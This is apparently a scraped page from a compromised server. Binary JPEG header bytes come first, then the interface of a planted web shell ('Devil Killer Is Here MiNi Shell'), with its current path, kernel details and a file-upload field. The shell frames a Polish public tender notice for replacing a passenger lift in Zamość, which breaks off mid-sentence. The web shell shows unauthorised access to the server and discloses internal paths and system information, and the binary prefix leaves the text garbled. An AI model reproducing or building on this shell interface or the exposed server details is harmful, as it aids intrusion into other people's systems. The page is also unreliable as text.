JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210521/0006137001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00061370 z dnia 2021-05-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana dźwigu osobowego w budynku mieszkalnym, wielorodzinnym przy ul. Hrubieszowskiej 38A (klatka 1) w Zamościu w systemie „zaprojektuj i wybuduj” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Lokalowej w Zamościu Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950362673</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Peowiaków 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 6385256</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zgl@zgl-zamosc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgl-zamosc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie nieruchomościami wykonywane na zlecenie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana dźwigu osobowego w budynku mieszkalnym, wielorodzinnym przy ul. Hrubieszowskiej 38A (klatka 1) w Zamościu w systemie „zaprojektuj i wybuduj” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e581b7ce-b9fd-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00061370</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu, który dostępny jest pod adresem https://miniportal.gov.pl, ePuap pod adresem:<br/>https://epuap.gov.pl oraz poczty elektronicznej: mborsuk@zgl-zamosc.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjnej wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej(ePuap).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że: 1. Administratorem Pani/Pana danych<br/>osobowych jest ZGL w Zamościu Sp. z o.o., ul. Peowiaków 8, 22 400 Zamość. 2. W sprawach z<br/>zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych<br/>pod adresem e-mali: inspektor@cbi24.pl. 3. Dane osobowe będą przetwarzane w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego 4. Dane osobowe będą przetwarzane przez<br/>okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września 2019 r.– Prawo zamówień<br/>publicznych (Dz. U. z 2019 r. poz. 2019), przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas obowiązywania umowy. 5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1<br/>lit. c) ww. Rozporządzenia w związku z przepisami PZP.6. Odbiorcami Pani/Pana danych będą osoby<br/>lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art.<br/>74 ust. 4 Pzp. 6. Osobie, której dane dotyczą nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e<br/>Rozporządzenia prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 Rozporządzenia; na podstawie art. 21 Rozporządzenia prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych. 7. W przypadku gdy wykonanie obowiązków, o których mowa<br/>w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie dużego wysiłku, Administrator może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego. 8. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani<br/>zmianą postanowień umowy w zakresie niezgodnym z Pzp. 9. Wystąpienie z żądaniem, o którym mowa<br/>w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego. 10. W przypadku danych osobowych<br/>zamieszczonych przez Administratora w Biuletynie Zamówień Publicznych, prawa, o których mowa w<br/>art. 15 i art.16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do<br/>Administratora. 11. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku, gdy<br/>wniesienie żądania, o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie<br/>udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą<br/>przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia. 12. W przypadku gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia, wymagałoby niewspółmiernie dużego<br/>wysiłku, Administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DO-ZP.252.2.TP.rb.2021.MB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wymiana dźwigu osobowego w budynku mieszkalnym,<br/>wielorodzinnym przy ul. Hrubieszowskiej 38A (klatka 1) w Zamościu w systemie „zaprojektuj i<br/>wybuduj”, zestaw wymagań dotyczy demontażu istniejącego dźwigu oraz zaprojektowania,<br/>wykonania, dostawy i zainstalowania nowego dźwigu osobowego wraz ze wszystkimi<br/>instalacjami i systemami oraz pracami budowlanymi wewnątrz i zewnątrz szybu dźwigowego w<br/>obrysie drzwi przystankowych – zgodnie z Programem funkcjonalno-użytkowym stanowiącym<br/>zał. nr 9 do SWZ oraz serwisowanie dźwigu wraz z pogotowiem dźwigowym przez okres<br/>udzielonej gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42416100-6 - Windy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">168 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert stosując zasadę, że oferta nieodrzucona, zawierająca największą ilość punktów, jest ofertą najkorzystniejszą.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>Do oceny punktowej ofert zastosowane zostaną wzory.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, uzyskaną łącznie we wszystkich kryteriach oceny ofert. Łącznie oferta najkorzystniejsza może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu oraz<br/>spełniają warunki udziału w postępowaniu dotyczące: <br/>1) zdolności do występowania w obrocie<br/>gospodarczym: Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej Wykonawca spełni warunek, jeśli wykaże, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 300 000,00 zł,<br/>4) zdolności<br/>technicznej lub zawodowej Wykonawca spełni warunek, jeśli wykaże, że: a) w okresie ostatnich 5<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie – wykonał co najmniej pięć zamówień, obejmujących swoim zakresem montaż lub<br/>wymianę dźwigu osobowego w budynku mieszkalnym, wielorodzinnym lub obiekcie<br/>użyteczności publicznej wraz z konserwacją i należytym serwisowaniem w okresie gwarancji o<br/>wartości robót nie mniejszej niż 120 000,00 zł brutto każda, wraz z podaniem jej rodzaju,<br/>wartości, daty i miejsca wykonania oraz załączy dowody określające, czy roboty budowlane<br/>zostały wykonane należycie, w szczególności, czy zostały wykonane zgodnie z przepisami<br/>prawa budowlanego i prawidłowo ukończone. Wykazane przez Wykonawcę zadania na dzień<br/>złożenia ofert powinny być wykonane, tj. zakończone np. protokołem odbioru końcowego lub<br/>innym równoważnym dokumentem. b) dysponuje osobami o odpowiednich kwalifikacjach<br/>zawodowych, uprawnieniach, doświadczeniu i wykształceniu niezbędnym do wykonania<br/>zamówienia publicznego, tj.: - dysponuje i skieruje do realizacji zamówienia co najmniej jedną<br/>osobę do pełnienia funkcji kierownika budowy, posiadającą uprawnienia budowlane bez<br/>ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej<br/>przynależącą do Okręgowej Izby Inżynierów Budownictwa i posiadającą aktualne zaświadczenie<br/>z tej izby oraz: Kierownik budowy powinien posiadać uprawnienia budowlane do kierowania<br/>robotami budowlanymi zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j.: Dz.U. z<br/>2020 r. poz. 1333) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11.09.2014 r.<br/>w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje<br/>techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby,<br/>których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22.12.2015 r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t. j.: Dz.U. z 2020 r. poz. 220). - dysponuje i skieruje do realizacji zamówienia co<br/>najmniej 1 osobę, posiadającą uprawnienia kwalifikacyjne SEP typu E i D do 1 kV dla<br/>instalowanych urządzeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych Wykonawca zobowiązany jest<br/>dołączyć do oferty aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z<br/>postępowania, według wzoru określonego w załączniku nr 2 do SWZ. 2. Informacji z Krajowego<br/>Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, wystawionej nie<br/>wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 3. Oświadczenia wykonawcy, w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz.<br/>1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej według wzoru<br/>określonego w załączniku nr 5 do SWZ, 4. Zaświadczenia właściwego naczelnika urzędu skarbowego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1<br/>pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał<br/>płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności, 5. Zaświadczenia albo innego dokumentu właściwej<br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i<br/>zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące<br/>przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności, 6. Odpisu lub informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.<br/>1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych<br/>Wykonawca zobowiązany jest dołączyć do oferty aktualne na dzień składania ofert oświadczenie o<br/>spełnieniu warunków udziału w postępowaniu, według wzoru określonego w załączniku nr 3 do SWZ. 2.<br/>Dokument potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>niższą niż 300 000,00 zł. 3. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie - wraz z podaniem ich wartości, przedmiotu, daty, wykonania i podmiotów, na<br/>rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy, według wzoru określonego w załączniku nr 6 do SWZ.4. Wykaz osób,<br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami, wg wzoru określonego w załączniku nr 7 do SWZ, z<br/>załączeniem dowodów potwierdzających posiadanie wymaganych uprawnień przez te osoby.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w<br/>wysokości: 2 000,00 zł (słownie: dwa 